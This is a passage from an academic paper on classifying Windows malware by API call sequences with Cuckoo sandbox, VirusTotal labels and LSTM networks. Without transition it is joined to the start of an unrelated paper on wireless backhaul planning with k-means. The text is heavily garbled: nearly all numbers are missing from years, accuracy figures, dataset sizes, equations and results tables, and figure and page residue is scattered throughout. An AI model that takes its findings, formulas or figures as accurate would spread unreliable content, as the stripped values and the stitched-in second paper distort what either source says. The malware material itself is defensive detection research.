the authors generated six different categories of suspicious behavior of api call features based on these preliminary tests (alazab, venkataraman & watters, ). they applied static analysis techniques to detect malware; however, attackers use many evasion techniques to bypass such analysis. peiravian & zhu ( ) proposed a framework that uses permissions and api calls to detect malicious android applications. the permissions are extracted from android applications and combined with the api calls to characterize each application as either malware or benign. the inherent advantage of this framework is that it does not need to involve any dynamic tracing of the system calls but only uses simple static analysis to find the system functions involved in the application. experiments on real-world applications demonstrate the good performance of the framework for malware detection. furthermore, the framework can be generalized to all mobile applications for malware detection (peiravian & zhu, ). kolosnjaji et al. ( ) proposed an approach for malware classification that uses hybrid neural networks containing two convolutional layers and one recurrent layer to obtain the best features for classification. the authors obtained optimal classification results by combining convolutional and recurrent layers in the neural network architecture. the approach outperformed not only other simpler neural architectures, but also the most widely used hidden markov models and support vector machines (kolosnjaji et al., ). tian et al. ( ) proposed a scalable approach for malware vs. cleanware classification and malware family classification by investigating behavioral features using logs of various api calls. the authors used an automated tool running in a virtual environment to extract api call features from executables. later, pattern recognition algorithms and statistical methods are applied to differentiate between files. the research benefited from a dataset of , malware and cleanware samples to conduct experimental results. as per the results, this approach provides an accuracy of over % in distinguishing malware from cleanware and in the classification of malware into different families (tian et al., ). alazab et al. ( ) proposed an approach to detect obfuscated malware by investigating the structural and behavioral features of api calls. the authors used n-gram statistical analysis of api calls to analyze the similarities and distances of unknown malware to known behavior so that obfuscated malware could be detected efficiently. the authors used a dataset of malware and benign files to obtain experimental results. the approach demonstrates an accuracy of . % for the unigram model (alazab et al., ). when the studies above are examined, it is generally seen that representations that lose sequence information, such as tf-idf, are preferred, or that traditional machine learning methods are applied. although deep learning methods are not algorithmically new, they have become prominent in the field of machine learning today, as they are easy to implement technologically and can be trained with high-performance computation on systems such as gpus. for this reason, our study differs from other studies. preliminaries in this section, we briefly introduce windows api calls, the cuckoo sandbox environment, the virustotal service, and the lstm algorithm used for our proposed malware classification model.
windows api calls the windows api is an interface to application developers for developing applications on the windows operating system (hampton, baig & zeadally, ), designed mostly for the interaction between developers and the operating system. therefore, the operating system offers many services as api (https://docs.microsoft.com/en-us/windows/desktop/ apiindex/windows-api-list). an application developed to run on the windows operating system must call the interfaces presented as apis to use a function offered by the operating system. when an application is running on any operating system, it calls several api to complete an action. for example, when an application is requested to create a file, createfilea windows api (https://docs.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-createfilea) is called. all api calls made by an application on the system can show the overall behavior of that application. therefore, api calls-based approach is widely applied in the dynamic malware analysis showing how malware can behave accurately. in this study, we extract windows api calls made by malware on the operating system, and generate a feature set. later, we use these features to train the classifier in order to detect malware. cuckoo sandbox the cuckoo sandbox app is a free and public sandbox application compatible with different operating systems (ali et al., ). a detailed analysis report of the files considered as suspicious (noor, abbas & shahid, ) can be produced as part of malware analyses using this application. with the cuckoo sandbox application, it is possible to prepare and run malicious software in an environment similar to a real working environment. it’s used to analyze files and collect comprehensive analysis results about the behavior and structural features of malicious software, such as api calls of malware, network traffic, memory dump, etc. the collected data are saved in a mongodb database in json format. cuckoo sandbox has two main components. the first component is the management machine used to start the analysis of malware, to store the results in the database, and to start the web service provided for the users. the other component is the analysis machine, virtual or physical machine, on which the malicious software is run, the actual analysis is performed, similar to the real working environment of the malicious software. in our study, the windows api call sequences representing the behavior of malware are collected using this application. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://docs.microsoft.com/en-us/windows/desktop/apiindex/windows-api-list https://docs.microsoft.com/en-us/windows/desktop/apiindex/windows-api-list https://docs.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-createfilea http://dx.doi.org/ . /peerj-cs. virustotal service virustotal is an online service that analyzes suspicious files or urls (shiel & o’shaughnessy, ). different antivirus application engines and website browsers execute suspicious files/urls for malicious activities. each antivirus application engine provides a detailed report, including registry access, dns resolutions, etc. virustotal service provides analysis reports from antivirus applications with an interface without any interpretation, because this service includes an extensive analysis archive, users can perform a new analysis as well as other analysis reports of other users. 
virustotal provides an interface for receiving services without using a web browser (virustotal public api v . ), giving the possibility to application developers to nalyze files and urls (martn, hernndez & de los santos, ) automatically. the body of the response is usually a json object containing the analysis results of antivirus application engines or web browsers separately. we have identified the families of malware by processing the results we obtain from the api, and we have assigned labels to each malware. long-short term memory lstm is a recurrent neural network (rnn) based deep learning method (muzaffar & afshari, ). lstm was developed because rnn not successful enough in long-term learning. lstm has an architecture that can remember and learn any long-term dependency at random intervals. it is considered a successful method to analyze data or events that have a specific relationship, especially in order of time (hochreiter & schmidhuber, ). for example, if the time series data are x={x ,...,xt}, h={h ,...,ht} is the hidden vector sequence and y={y ,...,yt} shows an output vector sequence, then t iteration is defined as follows: ht =h(wxhxt +whhht− +bh) ( ) yt =f(whyht +by) where wxh, whh, and why are the computation time connection weight matrices and f is the activation function. system architecture this research has two main objectives; first, we created a relevant dataset, and then, using this dataset, we did a comparative study using various machine learning to detect and classify malware automatically based on their types. dataset creation one of the most important contributions of this work is the new windows pe malware api sequence dataset, which contains malware analysis information. are malware from different classes in this dataset. the cuckoo sandbox application, as explained above, is used to obtain the windows api call sequences of malicious software, and virustotal service is used to detect the classes of malware. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure general system architecture. architecture consists of parts; data collection, data pre- processing, and data classification. full-size doi: . /peerjcs. /fig- figure illustrates the system architecture used to collect the data and to classify them using lstm algorithms. our system consists of three main parts, data collection, data pre-processing and analyses, and data classification. the following steps were followed when creating the dataset. cuckoo sandbox application is installed on a computer running ubuntu linux distribution. the analysis machine was run as a virtual server to run and analyze malware. the windows operating system is installed on this server. the firewall has been turned off, and no operating system updates have been made to prevent any malware from running. the tools versions are; ubuntu . , cuckoo . . , windows analysis os, virtualbox . . , python . . . once the data are collected, we start the process to analyses and pre-process the malware using cuckoo as a dynamic more than , malware have been run separately in the cuckoo sandbox application, and the results are all stored in a mongodb database. from this analysis information, we obtained the behavioral data of the malware on the analysis machine. this behavior is all windows api call requests that the malware has made on the windows operating system. 
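as an illustration of how this behavioral data can be turned into the rows of the dataset, the sketch below reads one cuckoo report.json, extracts the ordered windows api call names, and maps them to integer indices. it assumes the usual cuckoo report layout (behavior -> processes -> calls -> api); the file name and the index mapping are hypothetical and only show the idea, not the exact extraction code used in this study.

import json

def extract_api_sequence(report_path):
    # assumed cuckoo layout: report["behavior"]["processes"][i]["calls"][j]["api"]
    with open(report_path, "r", encoding="utf-8") as f:
        report = json.load(f)
    sequence = []
    for process in report.get("behavior", {}).get("processes", []):
        for call in process.get("calls", []):
            name = call.get("api")
            if name:
                sequence.append(name)            # preserve the original call order
    return sequence

calls = extract_api_sequence("report.json")      # hypothetical report file
vocab = {name: idx for idx, name in enumerate(sorted(set(calls)))}
indexed_row = [vocab[name] for name in calls]    # one dataset row: an ordered sequence of api indices
print(len(vocab), indexed_row[:10])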
some of the data pre-processing activities are: • indexing windows api calls: when we examined the windows api calls in the dataset, we found that there were different api calls. these api calls are indexed from to . as a result, each row in the dataset represents the api call sequence of one malware analysis. • dataset filtering: since these malware are developed with a specific target in mind, we filtered the api call sequences and discarded the rows that did not contain at least different api calls. • analysis of malware using the virustotal public api: we determined the hash value of each malware sample that we analyzed and queried these hash values with the virustotal service. figure : malware class distribution — the number of malware samples in each class (adware, backdoor, downloader, dropper, spyware, trojan, virus, worms). we stored the analysis results from the virustotal service into a database. thus, each malware was analyzed by many different antivirus engines, and the results of the analysis were recorded. • processing of analysis results: based on the results of each analysis we obtained using this service, we labeled all the malware. during this process, we found out that different antivirus applications give different results for the same malware, or sometimes not every antivirus application can detect every malware. for example, when we analyze the hash value e cf c c a a af fce in the virustotal service, many of the engines indicate that this file is a worm, while drweb says it is a trojan, and babable claims that it is a clean file. therefore, in determining the classes of malware, we considered the majority class in the analyses: if the majority of engines agree that a particular sample belongs to a class, then that class is assigned. • creating the dataset: finally, the labeled training dataset was created by matching the windows api call sequences and the malware classes. this dataset contains different classes of malware. our dataset is publicly available on the github website (https://github.com/ocatak/malware_api_class). the number of malware samples included in these classes is shown in fig. . in this study, the malware classification method was developed by using the lstm algorithm. the lstm algorithm does not require any vectorization model, such as tf-idf, because it works with sequential data. however, it is necessary to compare the classification performance of the developed method with other traditional machine learning algorithms such as support vector machine, decision tree, and k-nearest neighbor. tf-idf model and traditional classification algorithms in 'tf-idf', we describe how to transform the text with the tf-idf method. tf-idf term frequency-inverse document frequency based text dataset vectorization is a traditional method to create a numerical dataset. each term t in a document d is assigned a weight according to its frequency of occurrence in that document (manning, raghavan & schütze, ). this process is called term frequency, tf(t,d). the vector thus formed can be considered as a digitized summary of a document. let f(t,d) denote the raw frequency of term t in document d. term frequency can then be written as $tf(t,d) = f(t,d)$ ( ). however, a dataset generated only from term frequencies assigns equal importance to each term, regardless of how common a term is across the collection. the inverse document frequency (idf) is defined as the logarithm of the division of the number of documents in the collection, $N$, by the document frequency, $df_t$: $idf_t = \log \frac{N}{df_t}$ ( ). thus, if $df_t$ is low in the collection, the $idf_t$ value will be high, and for terms with a high $df_t$ the $idf_t$ value will be low. to calculate the weights of the terms contained in each document, the term frequency, $tf_{t,d}$, and the inverse document frequency, $idf_t$, are combined to form the term frequency-inverse document frequency (tf-idf) matrix: $tf\text{-}idf_{t,d} = tf_{t,d} \times idf_t$ ( ). the tf-idf model is used here only because these classification algorithms work with numerical data; tf-idf is not used in our lstm model. classifier learning the steps – are run separately for each type of malware, creating classification models for different types. the experiments are done using the python programming language and the machine learning libraries keras, tensorflow, and scikit-learn. we used the keras library to build lstm networks, and we have created a two-tier lstm structure. in algorithm , we explain the general steps of our classifier building stage. accordingly, our algorithm's time and space complexity are both o(n). in the algorithm, the main loop builds a representative classifier for each distinct label. figure shows the flowchart of the overall method. the process of malware classification includes the following steps in the proposed solution: . we select the malware type that we want to classify. . we process the dataset for the selected malware type. the model assigns label to the malware type of interest and label to the other categories.
the lstm network model receives the api calls that each malware makes on the windows operating system and assigns the class label to ŷ. as we apply the classifiers to each of the malware classes, our classifier is binary ones. log loss function is used as the loss function, shown in eq. ( ). l(y,ŷ)= l l=|l|∑ l= − ( yl log(ŷl)+( −yl)log( − ŷl) ) ( ) evaluation since the dataset that is used in our experiments highly imbalanced, traditional accuracy based performance evaluation is not enough to find out an optimal classifier. we used four different metrics, the overall prediction accuracy, average recall, average precision (turpin & scholer, ) and f score, to evaluate the classification accuracy, which measurement metrics in information retrieval (manning, raghavan & schütze, ; makhoul et al., ). experiments and results in this study, we performed the classification of malware belonging to different families in the dataset described in section . with the lstm algorithm. all experiments were run in a python environment, and all algorithm codes have been modified to build a catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. start split dataset into train ( % xtrain) and test ( % xtest) foreach class c ∈ c change corresponding label yc ← { , if y = c , otherwise train test split for the dataset with new label xtrain, xtest, ytrain, ytrain ← train test split(x, yc, . ) build classifier hc for class c and evaluate the h using xtest, ytest set of classifiers:h overall test of h model building exit classifier building loop validation data model building loop figure flflow chart of the overall system. full-size doi: . /peerjcs. /fig- classification model from the given data. our codes can be accessed on our github repository (https://github.com/ocatak/malware_api_class/tree/master/src). as we have explained in the previous sections, we can analyze the sequential data with the lstm algorithm that we have used within the scope of this study and create a classification model as a result. when it is desired to a model using other classification algorithms, the existing text data should be digitized. for this purpose, we used the tf-idf method, which is the most common text digitization method. we used our numerical data set with this method with the k-nearest neighborhood, decision tree (dt), and support vector machine (svm) algorithms. in ‘tf-idf’, we describe how to transform the text with the tf-idf method. in this section, we will share the experimental results for binary and multi-class classification separately. we designed different experiments for multi-class classification; catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/ocatak/malware_api_class/tree/master/src http://dx.doi.org/ . /peerj-cs. lstm - lstm - <start> lzcopy createprocess getpriorityclass encryptfile openprocess malicious/benign lstm based classification model figure lstm classification model with windows api calls. full-size doi: . /peerjcs. /fig- single layer lstm and two layers lstm. the purpose of doing this is that two-layer lstm models are overfitting in some cases. model configuration since we wanted to create a model for each class, we edited the class information in the dataset. we assigned for the malware class to be analyzed and for the others. since we do this while creating each classification model, these models perform binary type classification. 
for example, the result of the classification model created for the adware class is adware or other. we used tanh, relu, sigmoid, softplus, softsign, softmax and linear activation functions and created eight different models for each malware class. we have used the same flow layers, although there are different numbers of data analyzed at the stage of creating malware models. an example of the flow layers of the models is the adware classification model, which is shown in fig. . binary classification results table shows the classification performance of lstm and conventional algorithms results. although the accuracy rates of the traditional methods and the deep learning methods seem to be similar, f values give more meaningful information due to the lack of close class distributions. f represents the balance between precision and recall values. therefore, the f values obtained by the deep learning method better than the f values obtained by the traditional methods. this suggests that deep learning is better for analyzing malware behavior. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. embedding_ : embedding input: output: (none, ) (none, , ) lstm_ : lstm input: output: (none, , ) (none, , ) dropout_ : dropout input: output: (none, , ) (none, , ) lstm_ : lstm input: output: (none, , ) (none, , ) flatten_ : flatten input: output: (none, , ) (none, ) dense_ : dense input: output: (none, ) (none, ) figure the classification model layers and their neurons. full-size doi: . /peerjcs. /fig- as expected, based on the experimental results, the classification performance of the models created by using traditional classification algorithms using the tf-idf based vectorization method, where the sequence information is not used, is lower than the performance of the model created using the lstm algorithm. considering all four classification evaluation metrics, we proposed a practical implementation of the malware detection model using the lstm algorithm. our proposed method is more efficient as we obtained better scores on all the evaluation metrics. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table lstm and conventional algorithms classification results. adware backdoor downloader dropper spyware trojan virus worm lstm accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . func. tanh tanh soft sign soft sign soft sign soft sign tanh soft sign k-nn accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . dt accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . rbf svm accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . sigmoid svm accuracy . . . . . . . . precision . recall . f . notes. bold values indicate the best value of each column. based on the results and the classification performance shown in table , we conclude that the lstm model is the best approach that provides the best performance for all evaluation metrics. multi-class classification results using our data set, we created several multi-class classification models with different classes are also created. especially by using different hyper-parameters, the most successful models were tried to be obtained. f metric value will be used to compare the analysis results. 
the classification_report method in the sklearn.metrics the end library was used to calculate the f , precision, recall, and average values of these values. the average f catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. embedding_ : embedding input: output: (none, ) (none, , ) lstm_ : lstm input: output: (none, , ) (none, ) dense_ : dense input: output: (none, ) (none, ) figure single layer lstm classification model structure. full-size doi: . /peerjcs. /fig- value produced by this method takes into account the precision and recall values and class weights in the dataset. single layer lstm results single-layer lstm models have been created that can classify different types of malware. these models produce an output between – . these values represent malware class. figure shows our single layer lstm architecture. while creating the models, it is aimed to obtain the best classification model by using many different hyper-parameters. table shows our hyper-parameter search space. table shows the best classification performance obtained using following hyper- parameters. the training history, accuracy and loss graphs of the model created by using the best hyper-parameters are given in figs. a and b respectively. when the graphics are examined, it is seen that the model education process stops at the th epoch. the reason for this situation is that the model comes to the overfitting point. during the model trainings, using the earlystopping parameter, it was ensured that the education was terminated without reaching the extreme fit of the model. the confusion matrix information obtained as a result of testing the trained classification model is given in table . the analysis results obtained by testing the trained classification model are shown in table . two layers lstm results two-layer lstm models have been created that can classify different types of malware. these models produce an output between – . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table hyper-parameter search space to tune the model. hyper-parameter search space embedding layer number of units - lstm layer number of units - activation function: anh activation function tanh , relu, sigmoid, softplus, softsign, softmax, linear kernel initializer: kernel initializer random_uniform, glorot_uniform, lecun_uniform, uniform dropout: dropout . - . optimizer: optimizer adam, adadelta, adamax, nadam table best hyper-parameters. hyper-parameter value embedding units units: units activation sigmoid kernel_initializer glorot_uniform dropout . optimizer adam epoch . . . . . . . ac cu ra cy training validation (a) accurancy (b) loss epoch . . . . . . . lo ss training validation figure single layer lstm model accuracy-loss graphics. (a) accuracy; (b) loss. full-size doi: . /peerjcs. /fig- table shows the best classification performance hyper-parameters. according to fig. , the model training process stops at the th epoch because of overfitting limit. during the model trainings, the training was ended before the model reached the extreme fit state by using the earlystopping parameter. confusion matrix is given in table . table shows the two layers lstm model classification performance results. multi-class classification model results obtained using different algorithms are given in table . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. 
/fig- http://dx.doi.org/ . /peerj-cs. table single layer lstm model confusion matrix. table single layer lstm model classification results. precision recall f adware . . . backdoor . . . downloader . . . dropper . . . spyware . . . trojan . . . virus . . . worm . . . average . . . table hyper-parameter search space to tune the model. hyper-parameter search space embedding units units: units lstm- activation : softsign softsign lstm- kernel_initializer glorot_uniform lstm- activation : softsign softsign lstm- kernel_initializer glorot_uniform lstm- recurrent_dropout . dense kernel_regularizer regularizers.l ( . ) dense activity_regularizer regularizers.l ( . ) optimizer: adam optimizer adam results as expected, based on the experimental results, lstm based malware classification than the tf-idf based conventional machine learning algorithms’ classification performance. considering all the four classification evaluation metrics, we proposed a practical implementation of the malware classification model using sequential based windows os api calls and lstm networks. our proposed method is more efficient as we get better scores on evaluation metrics. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. epoch . . . . . . ac cu ra cy (a) accuracy (b) loss epoch . . . . . lo ss training validation training validation figure two layers lstm model accuracy-loss graphics. (a) accuracy; (b) loss. full-size doi: . /peerjcs. /fig- table two layers lstm model confusion matrix. table . hyper-parameter search space to tune the model. hyper-parameter search space embedding units units lstm- activation softsign lstm- kernel initializer glorot uniform lstm- activation softsign lstm- kernel initializer glorot uniform lstm- recurrent dropout . dense kernel regularizer regularizers.l ( . ) dense activity regularizer regularizers.l ( . ) optimizer adam epoch . . . . . . a c c u ra c y (a) accuracy (b) loss epoch . . . . . lo s s training validation training validation figure . two layers lstm model accuracy-loss graphics table . two layers lstm model confusion matrix predicted label tr ue la be l table shows the two layers lstm model classification performance results. multi-class classification model results obtained using different algorithms are given in table . . results as expected, based on the experimental results, lstm based malware classification model’s performance is better than the tf-idf based conventional machine learning algorithms’ classification performance. considering all the four classification evaluation metrics, we proposed a practical implementation of the / peerj comput. sci. reviewing pdf | (cs- : : : : :check jun ) manuscript to be reviewedcomputer science based on the results presented in section . and section . the computation results shown in table , it can be concluded that lstm is the best approach that provides best results for all evaluation metrics. on the other hand, if we compare the training periods, the training of lstm models takes longer. the features of the computer where the experiments are carried out are as follows; windows ( bit), intel(r) core(tm) i - cpu@ . ghz, and gb ram. the training durations are • single layer lstm: . min • two lyers lstm: . min • decision tree: . min • knn: . min catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table two layers lstm model classification performance results. 
precision recall f adware . . . backdoor . . . downloader . . . dropper . . . spyware . . . trojan . . . virus . . . worm . . . average . . . table multi-class classificaton model performance results. precision recall f lstm . . . lstm . . . dt . . . knn . . . rf . . . svm . . . • rf: . min • svm: . min sequential data are used for lstm while making the vectorizing process using the tf-idf model with conventional methods. according to confusion matrices on tables – , we can conclude that the most discriminating malware class is trojan and the least discriminating class is spyware. from these results, we can conclude that the samples belonging to the spyware malware class do not follow a particular api call sequence. although the model complexity was increased with layers of lstm, and we did not see a significant difference when we examined the classification performances. conclusion and future works the purpose of this study was to create a dataset by obtaining runtime system calls made by malicious software on windows . as a result, we built a dataset that contains the malware behavioral data at runtime and class labels to which the software was included. classification model is proposed, and this dataset created a model for malware detection using deep learning method lstm. we build separate classification models for each malware family and found that the results of the classification of these models showed a success rate between . % to . %. we can say that our classification method exhibits excellent performance because catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. virustotal services malware family labeling cannot be accurate. also we showed that single- layer lstm and two-tier lstm models achieved almost the same classification results. thus, the complexity of the model doesn’t increase performance. although our dataset contains instances that belong to some malware families with unbalanced distribution, we have shown that this problem does not affect classification performance. our research can be applied to other malware families as well because the behavior demonstrated by metamorphic malware in an operating system is similar do the other family members. as a result, the lstm approach can be used in the classification of metamorphic malware, and this study is a conceptual proof of this finding. it is assumed that the malware did not detect the sandbox environment in the dataset we used in this analysis. some sophisticated malware the potential to identify that they are being run in an isolated environment by using the images methods have started to be introduced instead of running such malware in a sandbox environment to detect such malware that changes behavior by detecting an anti-vm environment. as future work, we intend to use malware images method to classify the correctly labeled dataset. besides, we want to use other sequential data classification algorithms used before deep learning. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • ferhat ozgur catak and ahmet faruk yazı conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. 
• ogerta elezaj and javed ahmed analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the mal-api- dataset is available at github: https://github.com/ocatak/malware_api_class python source folder is also available at github: https://github.com/ocatak/malware_ api_class/tree/master/src. references ahmed me, nepal s, kim h. . ‘‘medusa: malware detection using statistical analysis of system’s behavior’’. in: ieee th international conference on collaboration and internet computing (cic). piscataway: ieee. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class/tree/master/src https://github.com/ocatak/malware_api_class/tree/master/src http://dx.doi.org/ . /peerj-cs. alazab m, layton r, venkataraman s, watters p. . malware detection based on structural and behavioural features of api calls. in: st international cyber resilience conference. alazab m, venkataraman s, watters p. . towards understanding malware be- haviour by the extraction of api calls. in: second cybercrime and trustworthy computing workshop. – doi . /ctc. . . ali m, shiaeles s, clarke n, kontogeorgis d. . a proactive malicious software identification approach for digital forensic examiners. journal of information security and applications : – doi . /j.jisa. . . . Çatak fÖ, yazi af. . a benchmark api call dataset for windows pe malware classification. corr. arxiv preprint. arxiv: . . cheng jy, tsai t, yang c. . ’’an information retrieval approach for malware classification based on windows api calls’’. in: international conference on machine learning and cybernetics. hampton n, baig z, zeadally s. . ransomware behavioural analysis on win- dows platforms. journal of information security and applications : – doi . /j.jisa. . . . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – . kolosnjaji b, zarras a, webster g, eckert c. . deep learning for classification of malware system call sequences. cham: springer international publishing, – . leder f, steinbock b, martini p. . ‘‘classification and detection of metamorphic malware using value set analysis’’. in: international conference on malicious and unwanted software (malware). makhoul j, kubala f, schwartz r, weischedel r. . performance measures for information extraction. in: proceedings of darpa broadcast news workshop. – . manning cd, raghavan p, schütze h. . introduction to information retrieval. new york: cambridge university press. martín i, hernández ja, de los santos s. . machine-learning based analysis and classification of android malware signatures. future generation computer systems : – doi . /j.future. . . . mehra v, jain v, uppal d. . ‘‘dacomm: detection and classification of metamor- phic malware’’. in: fifth international conference on communication systems and network technologies. muzaffar s, afshari a. . short-term load forecasts using lstm networks. energy procedia : – innovative solutions for energy transitions doi . /j.egypro. . . . noor m, abbas h, shahid wb. . countering cyber threats for industrial applica- tions: an automated approach for malware evasion detection and analysis. journal of network and computer applications : – doi . /j.jnca. . . . peiravian n, zhu x. . machine learning for android malware detection using permission and api calls. 
application of wireless return topology planning based on k-means
yang weixia, xu fei, li he, chen yuan — school of computer science and engineering, xi'an technological university, shaanxi, xi'an, china (e-mail: @qq.com)
abstract—with the development of communication technology and the general trend toward interconnection and intercommunication, people's demand for high-quality information and communication services is increasing day by day, and the dense deployment of base stations has become the trend in building a new generation of communication networks. to address urban and rural scenarios where traditional transport networks cannot reach, this paper keeps the operators' site cost low while maintaining signal transmission quality, giving full play to the advantages of traditional planning concepts and artificial intelligence algorithms. integrating the ideas of "partitioning", "step-by-step optimization", "local optimality" and "working backwards from the results", we set up a mathematical analysis model of the wireless return network topology planning problem. the goals of this paper are to reduce cost and to reduce the return path loss. for the lower-cost problem, a locally optimal model is constructed: the sites are first divided into k regions by the k-means algorithm, and each region is further split into n host-station groups, again with k-means; each group is limited to exactly one host station, the butterfly site closest to the group centroid is chosen as the host station, and the remaining sites become sub-stations. the group type is then used to judge whether the number of sub-stations satisfies the constraints; if not, the k value and the adjustable radius are changed, respectively, until the constraints are met and the best solution is calculated. for the lower return-path-loss problem, if only the loss is considered, the loss result is obtained by changing the first-hop and second-hop distances in the model, and the comparison of the results gives the best scheme when only loss is considered.
keywords—wireless return; base station deployment; k-means algorithm; piecemeal optimization
i. the problem background
with the rapid development of mobile communication networks, mobile terminal devices and applications affect every aspect of people's lives. however, current network construction faces several problems: the acceleration of urban construction makes the urban environment more and more complex, which leads to many wireless signal black spots and weak-coverage areas in densely populated urban areas; some urban residents misunderstand base-station construction and believe that base stations in their community are seriously harmful, which makes the deployment of base stations significantly more difficult and increases the phenomenon of station demolition; and, due to the difficulties in property coordination in many communities, the completion rate of the last kilometer of transmission fiber deployment is low.
in literature [ ], the deployment principles, coverage characteristics and station-type selection of relay micro-base stations are studied and compared with conventional micro-base stations; an actual deployment scheme for relay micro-base stations is proposed and its effectiveness is verified. literature [ ] analyzes the principle and characteristics of relay technology and studies in depth the deep coverage of urban areas and the wide coverage of rural areas and roads. literature [ ] studies the impact of relay technology on the wireless network structure, wireless network planning, and the development of wireless network planning tools. literature [ ] discusses whether a broadband wireless communication system can be deployed under non-line-of-sight (nlos) conditions: can it provide reliable high-bandwidth connections, and is a reliable high-bandwidth nlos solution available? the above literature mainly starts from theory, while this paper studies the base-station deployment plan from the actual situation, establishes a model, verifies its feasibility, and finally achieves the goal of low cost and small path loss to improve the user experience.
ii. mathematical model
a. the known conditions
the location distribution of the candidate sites is known, and the number of sites is fixed. only the mutual locations and topological relationships between sites are considered, that is, only the distance between the host station and the sub-station is considered. the integrated cost of each station type is also known, including the integrated cost of the host station, the integrated cost of the sub-station, and the cost of satellite equipment.
total cost = host-station cost × number of host stations + sub-station cost × number of sub-stations + satellite cost × number of satellites
average cost = total cost / number of sites in the region
the topological relationship between sites meets the following conditions:
1) the distance between the host station and a first-level sub-station is no more than km, and the distance between sub-stations is no more than km.
2) sites are divided into two types: ruralstar (one sector) and butterfly station (two sectors).
3) if a site is a host station, the maximum number of first-level sub-stations in each sector is fixed, and the total number of sub-stations is bounded.
4) the coverage direction of the butterfly-station sectors is not considered.
5) the microwave communication distance between host stations is limited to km.
6) wireless return connections are used between host station and sub-station and between sub-stations.
7) each sub-station can have at most two wireless return links, that is, its upstream and downstream links are unique.
8) the relation graph between a host station and its sub-stations is similar to a tree.
9) there is only one path between any sub-station and its host station, and the number of hops is bounded.
10) there is a one-to-many relationship between a satellite and the host stations: a sufficiently small group of host stations can share one satellite.
the wireless return propagation is affected by nlos scenes, so free-space propagation is adopted to simplify the calculation. the model estimates the path loss between sites with the standard free-space formula
pl = 32.45 + 20·lg(d) + 20·lg(f)
where pl stands for the path loss in db, d is the distance between the two stations in km, and f is the transmission frequency in mhz (a constant default value is used).
average system loss = sum of all wireless return connection losses / number of wireless return connections
figure 1. schematic diagram of the connections between sites (host station, first-level and second-level sub-stations, with the hop-distance and hop-count limits).
b. question assumptions
1) assume the rrn (relay remote node) wireless transmission device serves as a sub-station;
2) assume that the denb, as the host station, can be divided into several host cells covering different directions;
3) assume that the effects of terrain blocking and of blocking by ordinary mobile-phone access on return quality are not considered;
4) assume that rebts interference is not considered;
5) the interference of adjacent base stations is not considered;
6) assume that the first hop of a cascade between base stations is not greater than km, and subsequent hops are not greater than km;
7) assume that the sector coverage direction of the butterfly station is not considered and its maximum number of sub-stations is fixed;
8) assume that the maximum number of sub-stations of a ruralstar station is fixed;
9) assume that the host stations are connected by microwave with a maximum communication distance of km;
10) suppose that host station and sub-station, and sub-station and sub-station, are connected by wireless return transmission;
11) assume that a sub-station can only have one host station and only one path to it, containing a bounded number of hops;
12) assume that each sub-station carries no more than the allowed number of wireless return connections;
13) assume that any host station has exactly one satellite responsible for its return transmission; host stations connected in the same piece can share one satellite, and each satellite can only bear the return data of a limited number of host stations;
14) assume that the total number of host stations is unlimited;
15) assume that the maintenance costs of host stations, sub-stations and satellites are not considered;
16) assume that other factors are not considered and the spherical model is transformed into a plane model;
17) assume that the path loss is estimated by the free-space model without considering the influence of nlos.
c. meaning of the symbols
table i. notation
los — line-of-sight transmission capability
roi — return on investment
nlos — non-line-of-sight transmission capability
rrn — the wireless return device of the wireless return scheme
rn — relay station
ue — ordinary mobile phone
pl — path loss
apl — average path loss
d — site spacing
f — transmission frequency
r — radius of the earth
s — spherical distance between sites
αi — longitude of point i
βi — latitude of point i
i — base-station identifier
xi — host station
yi — sub-station
zi — satellite point
c — the overall cost
fd — the first-hop distance
nd — the distance of each subsequent hop
fxi — butterfly host station
rxi — ruralstar host station
wl — microwave connection between host stations
wbl — wireless return connection between host station and sub-station and between sub-stations
js — the number of hops from a sub-station to its host station
ceil — the function that rounds up
d. the establishment and solution of the model
1) analysis of problems
